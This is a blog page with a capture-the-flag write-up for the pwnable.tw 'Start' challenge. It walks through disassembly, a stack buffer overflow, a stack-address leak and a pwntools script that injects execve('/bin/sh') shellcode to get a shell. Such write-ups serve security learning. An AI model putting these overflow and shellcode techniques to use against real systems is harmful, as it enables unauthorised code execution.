<!DOCTYPE html>
<html lang="en">
  <head>
  <meta charset="UTF-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <meta name="google-site-verification" content="5tL3vVFDCs7jVMzgjoYnu0u--R7lK5YU0vkMz_MQxdA" />
  <title>Unicorn's Blog | pwnable.tw Start</title>
  <link rel="icon" type="image/png" href="/~b12902079/assets/images/profile_picture.jpg">
  
  <link rel="stylesheet" href="/~b12902079/assets/css/post.css" />
  <link rel="stylesheet" href="/~b12902079/assets/css/syntax.css" />
  
  <link rel="stylesheet" href="/~b12902079/assets/css/common.css" />
  <script src="https://cdn.jsdelivr.net/npm/mathjax@2/MathJax.js?config=TeX-AMS-MML_HTMLorMML" type="text/javascript"></script>
  <script src="/~b12902079/assets/js/categories.js"></script>
  <script>
    const currentTheme = localStorage.getItem("theme");
    if (currentTheme) {
      document.documentElement.setAttribute(
        "data-theme",
        localStorage.getItem("theme")
      );
    }
  </script>
  
  <script defer src="/~b12902079/assets/js/collapsible.js"></script>
  <script defer src="/~b12902079/assets/js/lbox.js"></script>
  
</head>

  <body>
    <main>
      <header>
  <a class="site-title" href="/~b12902079/">Unicorn's Blog</a>
  <!-- dark/light mode -->
  <span id="dark-mode-toggle" style="cursor: pointer">
    <svg
      stroke="currentColor"
      fill="currentColor"
      stroke-width="0"
      viewBox="0 0 16 16"
      height="1.2em"
      width="1.2em"
      xmlns="http://www.w3.org/2000/svg"
    >
      <path
        d="M8 1a7 7 0 1 0 0 14A7 7 0 0 0 8 1zm0 13V2a6 6 0 1 1 0 12z"
      ></path>
    </svg>
  </span>
</header>

      <section class="article">
        <div class="article-header">
          <h2 class="article-title">pwnable.tw Start</h2>
          <small class="date">21 Feb 2025</small>
          <div class="categories">
            
            <a href="#!" class="category">pwnableTW</a>
            
            <a href="#!" class="category">writeup</a>
            
          </div>
        </div>
        <ul class="content"><li><a href="#problem">Problem</a></li><li><a href="#recon">Recon</a></li><li><a href="#exploit">Exploit</a><ul><li><a href="#buffer-overflow">Buffer Overflow</a></li><li><a href="#where-to-jump">Where to Jump</a></li><li><a href="#leak-stack-address">Leak stack Address</a></li><li><a href="#get-shell">Get Shell</a></li></ul></li></ul>
        <div class="content"><h1 id="problem">Problem</h1>

<blockquote>
  <p>Just a start.<br />
<br />
Don’t know how to start?<br />
Check <a href="https://www.youtube.com/watch?v=KWG7prhH-ks">GEF 101 - Solving pwnable.tw/start</a> by <a href="https://twitter.com/_hugsy_">@_hugsy</a></p>
</blockquote>

<ul>
  <li><code class="language-plaintext highlighter-rouge">start</code>: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped</li>
</ul>

<h1 id="recon">Recon</h1>

<p>Open the binary in binary ninja, the <code class="language-plaintext highlighter-rouge">_start()</code> function is simple, only contains 22 instructions.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08048060    int32_t _start()
--------------------------------------------------------------------
08048060  54                 push    esp {__return_addr} {var_4}
08048061  689d800408         push    _exit {var_8}
08048066  31c0               xor     eax, eax  {0x0}
08048068  31db               xor     ebx, ebx  {0x0}
0804806a  31c9               xor     ecx, ecx  {0x0}
0804806c  31d2               xor     edx, edx  {0x0}
0804806e  684354463a         push    0x3a465443 {var_c}
08048073  6874686520         push    0x20656874 {var_10}
08048078  6861727420         push    0x20747261 {var_14}
0804807d  6873207374         push    0x74732073 {var_18}
08048082  684c657427         push    0x2774654c {var_1c}
08048087  89e1               mov     ecx, esp {var_1c}
08048089  b214               mov     dl, 0x14
0804808b  b301               mov     bl, 0x1
0804808d  b004               mov     al, 0x4
0804808f  cd80               int     0x80
08048091  31db               xor     ebx, ebx  {0x0}
08048093  b23c               mov     dl, 0x3c
08048095  b003               mov     al, 0x3
08048097  cd80               int     0x80
08048099  83c414             add     esp, 0x14
0804809c  c3                 retn    
</code></pre></div></div>

<p>Which in pseudo C is:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">_start</span><span class="p">()</span> <span class="p">{</span>
    <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mh">0x14</span><span class="p">]</span> <span class="o">=</span> <span class="s">"Let</span><span class="se">\'</span><span class="s">s start the CTF:"</span><span class="p">;</span>
    <span class="n">write</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="mh">0x14</span><span class="p">);</span>
    <span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="mh">0x3c</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<h1 id="exploit">Exploit</h1>

<h2 id="buffer-overflow">Buffer Overflow</h2>

<p>The <code class="language-plaintext highlighter-rouge">read</code> function can results in stack buffer overflow to override <code class="language-plaintext highlighter-rouge">$ebp</code>, after sending pattern using pwntools, the program receive <code class="language-plaintext highlighter-rouge">SIGSEGV</code> at <code class="language-plaintext highlighter-rouge">0x66666666</code>, which is <code class="language-plaintext highlighter-rouge">ffff</code>, hence the padding is 20 and we have a arbitrary jump.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># template with $ pwn template --host chall.pwnable.tw --port 10000 start
</span>
<span class="n">io</span><span class="p">.</span><span class="nf">sendafter</span><span class="p">(</span><span class="sa">b</span><span class="sh">"</span><span class="s">Let</span><span class="sh">'</span><span class="s">s start the CTF:</span><span class="sh">"</span><span class="p">,</span> <span class="sa">b</span><span class="sh">"</span><span class="s">aaaabbbbccccddddeeeeffffgggghhhh</span><span class="sh">"</span><span class="p">)</span>
</code></pre></div></div>

<p><img src="/~b12902079/assets/images/pwnable-tw-Start/ebp-padding.png" alt="alt text" /></p>

<h2 id="where-to-jump">Where to Jump</h2>

<p>Since NX is disabled, we can write shellcode to stack and then jump to stack to get shell.</p>

<p><img src="/~b12902079/assets/images/pwnable-tw-Start/checksec.png" alt="alt text" /></p>

<h2 id="leak-stack-address">Leak stack Address</h2>

<p>However the stack address is randomized every time, to leak the stack address we need some lind of print function, fortunately the gadget at <code class="language-plaintext highlighter-rouge">0x08048087</code> is <code class="language-plaintext c highlighter-rouge">write(1, $esp, 0x14); read(0, $esp, 0x3c);</code>, it will print out the value at <code class="language-plaintext highlighter-rouge">$esp</code> and get another chance to overflow $ebp. Using the following script and setting breakpoint at <code class="language-plaintext highlighter-rouge">0x804808f</code> (<code class="language-plaintext highlighter-rouge">write()</code>), we can find that <code class="language-plaintext highlighter-rouge">buf</code>, refer as <code class="language-plaintext highlighter-rouge">buf1</code>, is at <code class="language-plaintext highlighter-rouge">leak - 0x1c</code> and the fake buffer of the second <code class="language-plaintext highlighter-rouge">write()</code>, refer as <code class="language-plaintext highlighter-rouge">buf2</code>, is at <code class="language-plaintext highlighter-rouge">leak - 0x4</code></p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">io</span><span class="p">.</span><span class="nf">sendafter</span><span class="p">(</span><span class="sa">b</span><span class="sh">"</span><span class="s">Let</span><span class="sh">'</span><span class="s">s start the CTF:</span><span class="sh">"</span><span class="p">,</span> <span class="sa">b</span><span class="sh">"</span><span class="s">a</span><span class="sh">"</span> <span class="o">*</span> <span class="mi">20</span> <span class="o">+</span> <span class="nf">p32</span><span class="p">(</span><span class="mh">0x8048087</span><span class="p">))</span>
<span class="n">leak</span> <span class="o">=</span> <span class="nf">u32</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="nf">recv</span><span class="p">(</span><span class="mi">4</span><span class="p">))</span>
<span class="n">log</span><span class="p">.</span><span class="nf">info</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">leak</span> <span class="o">=</span> <span class="si">:</span><span class="c1">#0x</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
</code></pre></div></div>

<p><img src="/~b12902079/assets/images/pwnable-tw-Start/buf1_address.png" alt="alt text" />
<img src="/~b12902079/assets/images/pwnable-tw-Start/buf2_address.png" alt="alt text" /> <br />
<img src="/~b12902079/assets/images/pwnable-tw-Start/leak_stack.png" alt="alt text" /></p>

<h2 id="get-shell">Get Shell</h2>

<p>The program flow we want to achieve is:</p>
<ol>
  <li>jump back the <code class="language-plaintext highlighter-rouge">write()</code>: first buffer overflow</li>
  <li>leak stack address: write gadget</li>
  <li>put shellcode on stack: second <code class="language-plaintext highlighter-rouge">read()</code></li>
  <li>jump to shellcode: second buffer overflow</li>
  <li>get shell, PWN!!!</li>
</ol>

<p>However, for step 3 the shortest shell code for <code class="language-plaintext highlighter-rouge">execve("/bin/sh")</code> is 23 bytes, which is longer than the 20 bytes buffer, notice that the first <code class="language-plaintext highlighter-rouge">read()</code> isn’t used and we also know the address of <code class="language-plaintext highlighter-rouge">buf1</code>, therefore it is a good place to put <code class="language-plaintext highlighter-rouge">"/bin/sh"</code>. The final exploit is as follow:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">io</span> <span class="o">=</span> <span class="nf">start</span><span class="p">()</span>

<span class="n">io</span><span class="p">.</span><span class="nf">sendafter</span><span class="p">(</span><span class="sa">b</span><span class="sh">"</span><span class="s">Let</span><span class="sh">'</span><span class="s">s start the CTF:</span><span class="sh">"</span><span class="p">,</span> <span class="sa">b</span><span class="sh">"</span><span class="s">/bin/sh</span><span class="se">\x00</span><span class="sh">"</span> <span class="o">+</span> <span class="sa">b</span><span class="sh">"</span><span class="s">a</span><span class="sh">"</span> <span class="o">*</span> <span class="mi">12</span> <span class="o">+</span> <span class="nf">p32</span><span class="p">(</span><span class="mh">0x8048087</span><span class="p">))</span>
<span class="n">leak</span> <span class="o">=</span> <span class="nf">u32</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="nf">recv</span><span class="p">(</span><span class="mi">4</span><span class="p">))</span>
<span class="n">log</span><span class="p">.</span><span class="nf">info</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">leak</span> <span class="o">=</span> <span class="si">:</span><span class="c1">#0x</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
<span class="n">buf1</span> <span class="o">=</span> <span class="n">leak</span> <span class="o">-</span> <span class="mh">0x1c</span>
<span class="n">log</span><span class="p">.</span><span class="nf">info</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">buf1</span> <span class="o">=</span> <span class="si">:</span><span class="c1">#0x</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
<span class="n">buf2</span> <span class="o">=</span> <span class="n">leak</span> <span class="o">-</span> <span class="mh">0x4</span>
<span class="n">log</span><span class="p">.</span><span class="nf">info</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">buf2</span> <span class="o">=</span> <span class="si">:</span><span class="c1">#0x</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>

<span class="n">shellcode</span> <span class="o">=</span> <span class="nf">asm</span><span class="p">(</span><span class="sa">f</span><span class="sh">"""</span><span class="s">
                mov eax, 0xb
                mov ebx, </span><span class="si">{</span><span class="nf">hex</span><span class="p">(</span><span class="n">buf1</span><span class="p">)</span><span class="si">}</span><span class="s">
                xor ecx, ecx
                xor edx, edx
                int 0x80
                </span><span class="sh">"""</span><span class="p">)</span>
<span class="n">log</span><span class="p">.</span><span class="nf">info</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">shellcode lenght: </span><span class="si">{</span><span class="nf">len</span><span class="p">(</span><span class="n">shellcode</span><span class="p">)</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
<span class="n">io</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="n">shellcode</span> <span class="o">+</span> <span class="sa">b</span><span class="sh">"</span><span class="se">\x90</span><span class="sh">"</span> <span class="o">*</span> <span class="p">(</span><span class="mi">20</span> <span class="o">-</span> <span class="nf">len</span><span class="p">(</span><span class="n">shellcode</span><span class="p">))</span> <span class="o">+</span> <span class="nf">p32</span><span class="p">(</span><span class="n">buf2</span><span class="p">))</span>

<span class="n">io</span><span class="p">.</span><span class="nf">interactive</span><span class="p">()</span>
</code></pre></div></div>
</div>
      </section>
      <footer>
  <p>&copy; 2024 - 2025 | Unicorn's Blog</p>
</footer>
<script src="/~b12902079/assets/js/mode.js" defer></script>

    </main>
    <section id="category-modal-bg"></section>
<section id="category-modal">
  <h1 id="category-modal-title"></h1>
  <section id="category-modal-content"></section>
</section>

  </body>
</html>
